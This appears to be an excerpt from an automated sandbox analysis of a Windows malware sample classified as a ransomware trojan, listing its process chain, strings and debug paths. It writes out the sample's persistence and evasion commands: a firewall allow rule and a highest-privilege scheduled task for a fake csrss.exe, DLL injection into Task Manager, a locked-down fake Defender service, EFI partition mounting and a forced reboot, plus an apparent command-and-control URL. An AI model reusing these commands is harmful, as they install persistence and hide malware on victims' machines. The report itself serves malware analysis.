            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh advfirewall firewall add rule name='csrss' dir=in action=allow program='C:\Windows\rss\csrss.exe' enable=yes
            Source: C:\Users\user\Desktop\f6oNLRKHUy.exeProcess created: C:\Windows\rss\csrss.exe C:\Windows\rss\csrss.exe ''
            Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR 'C:\Windows\rss\csrss.exe' /TN csrss /F
            Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /delete /tn ScheduledUpdate /f
            Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /s
            Source: C:\Windows\SysWOW64\mountvol.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknownProcess created: C:\Windows\rss\csrss.exe C:\Windows\rss\csrss.exe
            Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /d
            Source: C:\Windows\SysWOW64\mountvol.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /s
            Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\rss\csrss.exe C:\Windows\rss\csrss.exe
            Source: C:\Windows\SysWOW64\mountvol.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /d
            Source: C:\Windows\SysWOW64\mountvol.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknownProcess created: C:\Windows\rss\csrss.exe 'C:\Windows\rss\csrss.exe'
            Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\SysWOW64\shutdown.exe shutdown -r -t 5
            Source: C:\Windows\SysWOW64\shutdown.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\rss\csrss.exe C:\Windows\rss\csrss.exe
            Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
            Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
            Source: unknownProcess created: C:\Windows\rss\csrss.exe 'C:\Windows\rss\csrss.exe'
            Source: C:\Windows\rss\csrss.exeProcess created: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\user\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
            Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\windefender.exe C:\Windows\windefender.exe
            Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\rss\csrss.exe C:\Windows\rss\csrss.exe
            Source: C:\Windows\windefender.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\windefender.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
            Source: unknownProcess created: C:\Windows\windefender.exe C:\Windows\windefender.exe
            Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
            Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
            Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
            Source: C:\Users\user\Desktop\f6oNLRKHUy.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{76A64158-CB41-11D1-8B02-00600806D9B6}\InProcServer32
            Source: C:\Users\user\Desktop\f6oNLRKHUy.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
            Source: C:\Users\user\Desktop\f6oNLRKHUy.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Process WHERE Name = 'fragrantbutterfly.exe'
            Source: C:\Windows\rss\csrss.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
            Source: C:\Windows\rss\csrss.exeFile created: C:\Users\user\AppData\Local\Temp\csrss
            Source: classification engineClassification label: mal100.rans.troj.evad.winEXE@51/17@13/6
            Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exeCode function: 34_2_00007FF6A00927F0 CreateMutexW,SleepEx,CreateToolhelp32Snapshot,Process32FirstW,CloseHandle,lstrcmpiW,Process32NextW,FindCloseChangeNotification,GetLastError,SetLastError,OpenProcess,GetLastError,VirtualAllocEx,WriteProcessMemory,LoadLibraryW,CreateRemoteThread,CloseHandle,GetLastError,WaitForSingleObject,CloseHandle,CloseHandle
            Source: C:\Windows\rss\csrss.exeMutant created: \Sessions\1\BaseNamedObjects\Global\h48yorbq6rm87zot
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6484:120:WilError_01
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2916:120:WilError_01
            Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exeMutant created: \Sessions\1\BaseNamedObjects\Global\qtxp9g8w
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6048:120:WilError_01
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6424:120:WilError_01
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1260:120:WilError_01
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:488:120:WilError_01
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4904:120:WilError_01
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6856:120:WilError_01
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5632:120:WilError_01
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6488:120:WilError_01
            Source: f6oNLRKHUy.exeString found in binary or memory: application/app/install.go
            Source: f6oNLRKHUy.exeString found in binary or memory: for Decryptfailed to write an injector file %s: %wfirst install, ignore discover on starthttp: putIdleConn: keep alives disabledhttps://trumops.com/api/install-failureinvalid indexed representation index %dmismatched count during itab table copymissing argume
            Source: f6oNLRKHUy.exeString found in binary or memory: application/resilience/btcblockchain/address.go
            Source: f6oNLRKHUy.exeString found in binary or memory: largeunexpected length codewirep: invalid p statewrite on closed bufferzero length BIT STRINGzlib: invalid checksum into Go value of type ) must be a power of 2 /bots/scheduled-install23283064365386962890625<invalid reflect.Value>Argentina Standard TimeAstrakh
            Source: csrss.exeString found in binary or memory: application/app/install.go
            Source: csrss.exeString found in binary or memory: for Decryptfailed to write an injector file %s: %wfirst install, ignore discover on starthttp: putIdleConn: keep alives disabledhttps://trumops.com/api/install-failureinvalid indexed representation index %dmismatched count during itab table copymissing argume
            Source: csrss.exeString found in binary or memory: application/resilience/btcblockchain/address.go
            Source: csrss.exeString found in binary or memory: largeunexpected length codewirep: invalid p statewrite on closed bufferzero length BIT STRINGzlib: invalid checksum into Go value of type ) must be a power of 2 /bots/scheduled-install23283064365386962890625<invalid reflect.Value>Argentina Standard TimeAstrakh
            Source: C:\Windows\rss\csrss.exeFile read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: f6oNLRKHUy.exeStatic file information: File size 3788288 > 1048576
            Source: f6oNLRKHUy.exeStatic PE information: Raw size of UPX1 is bigger than: 0x100000 < 0x39ca00
            Source: Binary string: Loader.pdb source: f6oNLRKHUy.exe, 00000001.00000002.358486329.0000000000401000.00000040.00020000.sdmp, f6oNLRKHUy.exe, 00000003.00000002.367326262.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000008.00000002.621585860.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.384661299.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.388770510.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.401992805.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.402857398.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.422012324.0000000000401000.00000040.00020000.sdmp
            Source: Binary string: Unrecognized pdb formatThis error indicates attempting to access a .pdb file with source: f6oNLRKHUy.exe, 00000001.00000002.359471707.0000000000A5B000.00000040.00020000.sdmp, f6oNLRKHUy.exe, 00000003.00000002.368504046.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000008.00000002.627104144.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.389791464.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.391731285.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.404853371.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.407309703.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.427402619.0000000000A5B000.00000040.00020000.sdmp
            Source: Binary string: A connection with the server could not be establishedAn extended error was returned from the WinHttp serverThe .pdb file is probably no longer indexed in the symbol server share location. source: f6oNLRKHUy.exe, 00000001.00000002.359471707.0000000000A5B000.00000040.00020000.sdmp, f6oNLRKHUy.exe, 00000003.00000002.368504046.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000008.00000002.627104144.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.389791464.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.391731285.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.404853371.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.407309703.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.427402619.0000000000A5B000.00000040.00020000.sdmp
            Source: Binary string: Age does not matchThe module age and .pdb age do not match. source: f6oNLRKHUy.exe, 00000001.00000002.359471707.0000000000A5B000.00000040.00020000.sdmp, f6oNLRKHUy.exe, 00000003.00000002.368504046.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000008.00000002.627104144.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.389791464.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.391731285.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.404853371.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.407309703.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.427402619.0000000000A5B000.00000040.00020000.sdmp
            Source: Binary string: symsrv.pdb source: f6oNLRKHUy.exe, 00000001.00000002.360314790.0000000000C57000.00000040.00020000.sdmp, f6oNLRKHUy.exe, 00000003.00000002.370257629.0000000000C57000.00000040.00020000.sdmp, csrss.exe, 00000008.00000002.627870906.0000000000C57000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.390880568.0000000000C57000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.392824484.0000000000C57000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.406627827.0000000000C57000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.408434896.0000000000C57000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.428005891.0000000000C57000.00000040.00020000.sdmp
            Source: Binary string: Cvinfo is corruptThe .pdb file contains a corrupted debug codeview information. source: f6oNLRKHUy.exe, 00000001.00000002.359471707.0000000000A5B000.00000040.00020000.sdmp, f6oNLRKHUy.exe, 00000003.00000002.368504046.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000008.00000002.627104144.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.389791464.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.391731285.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.404853371.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.407309703.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.427402619.0000000000A5B000.00000040.00020000.sdmp
            Source: Binary string: C:\Users\mac\Desktop\driver-process-monitor\x64\Release\WinmonProcessMonitor.pdb source: f6oNLRKHUy.exe, 00000001.00000002.358486329.0000000000401000.00000040.00020000.sdmp, f6oNLRKHUy.exe, 00000003.00000002.367326262.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000008.00000002.621585860.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.384661299.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.388770510.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.401992805.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.402857398.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.422012324.0000000000401000.00000040.00020000.sdmp
            Source: Binary string: Downloading symbols for [%s] %ssrv*symsrv*http://https://_bad_pdb_file.pdb source: f6oNLRKHUy.exe, 00000001.00000002.359471707.0000000000A5B000.00000040.00020000.sdmp, f6oNLRKHUy.exe, 00000003.00000002.368504046.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000008.00000002.627104144.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.389791464.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.391731285.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.404853371.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.407309703.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.427402619.0000000000A5B000.00000040.00020000.sdmp
            Source: Binary string: The symbol server has never indexed any version of this symbol fileNo version of the .pdb file with the given name has ever been registered. source: f6oNLRKHUy.exe, 00000001.00000002.359471707.0000000000A5B000.00000040.00020000.sdmp, f6oNLRKHUy.exe, 00000003.00000002.368504046.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000008.00000002.627104144.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.389791464.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.391731285.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.404853371.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.407309703.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.427402619.0000000000A5B000.00000040.00020000.sdmp
            Source: Binary string: C:\Users\Admin\source\repos\ssdt-master\SSDT\win7x64\x64\Release\SSDTHook.pdb source: f6oNLRKHUy.exe, 00000001.00000002.358486329.0000000000401000.00000040.00020000.sdmp, f6oNLRKHUy.exe, 00000003.00000002.367326262.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000008.00000002.621585860.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.384661299.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.388770510.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.401992805.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.402857398.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.422012324.0000000000401000.00000040.00020000.sdmp
            Source: Binary string: PDB not foundUnable to locate the .pdb file in any of the symbol search path locations. source: f6oNLRKHUy.exe, 00000001.00000002.359471707.0000000000A5B000.00000040.00020000.sdmp, f6oNLRKHUy.exe, 00000003.00000002.368504046.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000008.00000002.627104144.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.389791464.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.391731285.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.404853371.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.407309703.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.427402619.0000000000A5B000.00000040.00020000.sdmp
            Source: Binary string: c:\Users\Admin\documents\visual studio 2015\Projects\Winmon\Release\Winmon.pdb source: f6oNLRKHUy.exe, 00000001.00000002.358486329.0000000000401000.00000040.00020000.sdmp, f6oNLRKHUy.exe, 00000003.00000002.367326262.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000008.00000002.621585860.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.384661299.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.388770510.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.401992805.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.402857398.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.422012324.0000000000401000.00000040.00020000.sdmp
            Source: Binary string: C:\vbox\branch\w64-1.6\out\win.amd64\release\obj\src\VBox\HostDrivers\VBoxDrv\VBoxDrv.pdb source: f6oNLRKHUy.exe, 00000001.00000002.358486329.0000000000401000.00000040.00020000.sdmp, f6oNLRKHUy.exe, 00000003.00000002.367326262.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000008.00000002.621585860.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.384661299.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.388770510.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.401992805.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.402857398.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.422012324.0000000000401000.00000040.00020000.sdmp
            Source: Binary string: Drive not readyThis error indicates a .pdb file related failure. source: f6oNLRKHUy.exe, 00000001.00000002.359471707.0000000000A5B000.00000040.00020000.sdmp, f6oNLRKHUy.exe, 00000003.00000002.368504046.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000008.00000002.627104144.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.389791464.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.391731285.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.404853371.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.407309703.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.427402619.0000000000A5B000.00000040.00020000.sdmp
            Source: Binary string: c:\Users\Admin\documents\visual studio 2015\Projects\Winmon\x64\Release\Winmon.pdb source: f6oNLRKHUy.exe, 00000001.00000002.358486329.0000000000401000.00000040.00020000.sdmp, f6oNLRKHUy.exe, 00000003.00000002.367326262.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000008.00000002.621585860.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.384661299.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.388770510.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.401992805.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.402857398.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.422012324.0000000000401000.00000040.00020000.sdmp
            Source: Binary string: Error while loading symbolsUnable to locate the .pdb file in any of the symbol search source: f6oNLRKHUy.exe, 00000001.00000002.359471707.0000000000A5B000.00000040.00020000.sdmp, f6oNLRKHUy.exe, 00000003.00000002.368504046.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000008.00000002.627104144.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.389791464.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.391731285.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.404853371.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.407309703.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.427402619.0000000000A5B000.00000040.00020000.sdmp
            Source: Binary string: zzz_AsmCodeRange_*FrameDatainvalid string positionstring too long.pdb source: f6oNLRKHUy.exe, 00000001.00000002.359471707.0000000000A5B000.00000040.00020000.sdmp, f6oNLRKHUy.exe, 00000003.00000002.368504046.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000008.00000002.627104144.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.389791464.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.391731285.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.404853371.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.407309703.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.427402619.0000000000A5B000.00000040.00020000.sdmp
            Source: Binary string: C:\Users\vladimir\source\repos\driver-process-monitor\Release\WinmonProcessMonitor.pdb source: f6oNLRKHUy.exe, 00000001.00000002.358486329.0000000000401000.00000040.00020000.sdmp, f6oNLRKHUy.exe, 00000003.00000002.367326262.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000008.00000002.621585860.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.384661299.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.388770510.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.401992805.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.402857398.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.422012324.0000000000401000.00000040.00020000.sdmp
            Source: Binary string: Pdb read access deniedYou may be attempting to access a .pdb file with read-only attributes source: f6oNLRKHUy.exe, 00000001.00000002.359471707.0000000000A5B000.00000040.00020000.sdmp, f6oNLRKHUy.exe, 00000003.00000002.368504046.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000008.00000002.627104144.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.389791464.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.391731285.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.404853371.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.407309703.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.427402619.0000000000A5B000.00000040.00020000.sdmp
            Source: Binary string: Unable to locate the .pdb file in this location source: f6oNLRKHUy.exe, 00000001.00000002.359471707.0000000000A5B000.00000040.00020000.sdmp, f6oNLRKHUy.exe, 00000003.00000002.368504046.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000008.00000002.627104144.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.389791464.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.391731285.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.404853371.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.407309703.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.427402619.0000000000A5B000.00000040.00020000.sdmp
            Source: Binary string: C:\Users\Admin\documents\visual studio 2015\Projects\WinmonFS\x64\Release\WinmonFS.pdb source: f6oNLRKHUy.exe, 00000001.00000002.358486329.0000000000401000.00000040.00020000.sdmp, f6oNLRKHUy.exe, 00000003.00000002.367326262.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000008.00000002.621585860.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.384661299.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.388770510.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.401992805.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.402857398.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.422012324.0000000000401000.00000040.00020000.sdmp
            Source: Binary string: The module signature does not match with .pdb signature. source: f6oNLRKHUy.exe, 00000001.00000002.359471707.0000000000A5B000.00000040.00020000.sdmp, f6oNLRKHUy.exe, 00000003.00000002.368504046.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000008.00000002.627104144.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.389791464.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.391731285.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.404853371.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.407309703.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.427402619.0000000000A5B000.00000040.00020000.sdmp
            Source: Binary string: .pdb.dbg source: f6oNLRKHUy.exe, 00000001.00000002.359471707.0000000000A5B000.00000040.00020000.sdmp, f6oNLRKHUy.exe, 00000003.00000002.368504046.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000008.00000002.627104144.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.389791464.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.391731285.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.404853371.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.407309703.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.427402619.0000000000A5B000.00000040.00020000.sdmp
            Source: Binary string: '(EfiGuardDxe.pdbx source: f6oNLRKHUy.exe, 00000001.00000002.359471707.0000000000A5B000.00000040.00020000.sdmp, f6oNLRKHUy.exe, 00000003.00000002.368504046.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000008.00000002.627104144.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.389791464.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.391731285.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.404853371.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.407309703.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.427402619.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000026.00000002.427962622.0000000000A5B000.00000040.00020000.sdmp
            Source: Binary string: symsrv.pdbGCTL source: f6oNLRKHUy.exe, 00000001.00000002.360314790.0000000000C57000.00000040.00020000.sdmp, f6oNLRKHUy.exe, 00000003.00000002.370257629.0000000000C57000.00000040.00020000.sdmp, csrss.exe, 00000008.00000002.627870906.0000000000C57000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.390880568.0000000000C57000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.392824484.0000000000C57000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.406627827.0000000000C57000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.408434896.0000000000C57000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.428005891.0000000000C57000.00000040.00020000.sdmp
            Source: Binary string: or you do not have access permission to the .pdb location. source: f6oNLRKHUy.exe, 00000001.00000002.359471707.0000000000A5B000.00000040.00020000.sdmp, f6oNLRKHUy.exe, 00000003.00000002.368504046.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000008.00000002.627104144.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.389791464.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.391731285.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.404853371.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.407309703.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.427402619.0000000000A5B000.00000040.00020000.sdmp
